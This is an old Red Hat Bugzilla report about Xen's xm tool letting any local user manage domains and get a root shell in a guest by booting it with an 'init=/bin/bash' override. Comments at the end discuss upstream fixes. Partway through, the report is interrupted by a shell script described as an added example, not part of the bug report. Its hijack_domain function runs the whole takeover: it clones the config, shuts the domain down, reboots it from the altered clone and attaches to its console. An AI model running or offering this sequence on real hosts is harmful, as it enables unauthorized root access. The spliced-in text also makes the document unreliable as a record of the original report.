Red Hat Bugzilla – Bug 161200
Any local user can create/destroy/... domains and attach to their consoles
Last modified: 2007-11-30 17:11:08 EST
Description of problem:
Any user can use "/usr/sbin/xm [list|create|console|shutdown|destroy|...]"
without additional authentication, even with SELinux activated.
You can even clone a domain config into /tmp, append
extra +=" init=/bin/bash"
and gain root access to that domain by shutting it down and booting it with the
evil clone config.
Version-Release number of selected component (if applicable):
Steps to Reproduce:
Log in as a local user (uid != 0) and manage domains with "/usr/sbin/xm".
You can do whatever you want.
Only root (or a configurable special user/group) can manage domains.
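The sequence the reporter describes, together with the check a practitioner would run first (can an ordinary user reach the xend control socket at all?), as an added shell example. It is not part of the bug report or of Xen; the socket path in XEND_SOCKET is an assumption, and hijack_domain assumes the unfixed xm/xend of the time and is only there to show the steps in order.

```shell
#!/bin/sh
# Added example (not from the bug report or from Xen/Red Hat): the
# reporter's "evil clone" step, plus a check for whether the xend control
# socket is writable by unprivileged users. XEND_SOCKET is an assumed path.

XEND_SOCKET="${XEND_SOCKET:-/var/run/xend/xend-socket}"

# world_writable PATH: succeed if "others" have write permission on PATH.
# Uses ls(1) so it works for sockets and does not need GNU stat(1);
# the 9th character of the mode string is the other-write bit.
world_writable() {
    mode=$(ls -ld "$1" | cut -c1-10) || return 1
    case "$mode" in
        ????????w?) return 0 ;;
        *)          return 1 ;;
    esac
}

# clone_config SRC DST: copy a domain config and append the override from
# the report. xm config files are executed as Python, so "extra +=" appends
# to any kernel command line the original config already set, and
# init=/bin/bash makes the guest boot straight into a root shell.
clone_config() {
    cp "$1" "$2" || return 1
    printf '%s\n' 'extra += " init=/bin/bash"' >> "$2"
}

# hijack_domain NAME SRC_CFG: the full sequence from the report, run as an
# ordinary user. Only meaningful on a host with the vulnerable xm/xend.
hijack_domain() {
    name=$1; src=$2
    evil=$(mktemp /tmp/evil-XXXXXX) || return 1
    clone_config "$src" "$evil" || return 1
    xm shutdown "$name" || return 1
    # wait until the domain is gone before booting the clone under its name
    while xm list "$name" >/dev/null 2>&1; do sleep 1; done
    xm create "$evil" || return 1
    xm console "$name"
}

# audit: report whether this host exposes xend to unprivileged users.
audit() {
    if [ "$(id -u)" -eq 0 ]; then
        echo "running as root; rerun as an ordinary user to test the bug"
        return 2
    fi
    if world_writable "$XEND_SOCKET"; then
        echo "$XEND_SOCKET is world-writable: any local user can drive xm"
        return 0
    fi
    echo "$XEND_SOCKET is not world-writable"
    return 1
}
```

On a host where audit reports the socket as world-writable, the fix the later comments point at is upstream (xend accepting commands only from privileged clients), not a distribution patch; until then, restricting the socket's permissions to root (or a management group) is the local mitigation.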
This is a known issue. I do not know if it is already fixed completely
upstream, but as Xen moved from TCP sockets to Unix sockets for xm/xend
communication, it should be easy to fix.
At least with the aid of SELinux.
I am not sure if this is still relevant with the Unix sockets model, but SuSE
did something about this security issue; read the "Security" chapter here:
"We changed the xend to observe the xend-privileged-port setting (in
xend-config.sxp). If it's set to 1, xend will only accept configuration
commands from ports below 1024. Together with only binding to localhost,
this should provide a minimum of security against local users to change
I agree that this should be improved, but IMHO it should be improved in the
upstream Xen code base and not forked in a distribution package.
I think Xen fixed the issue upstream, so I will upgrade the package in rawhide soon.
This should be fixed in current Xen 3, and I can't reproduce it on FC5 test releases.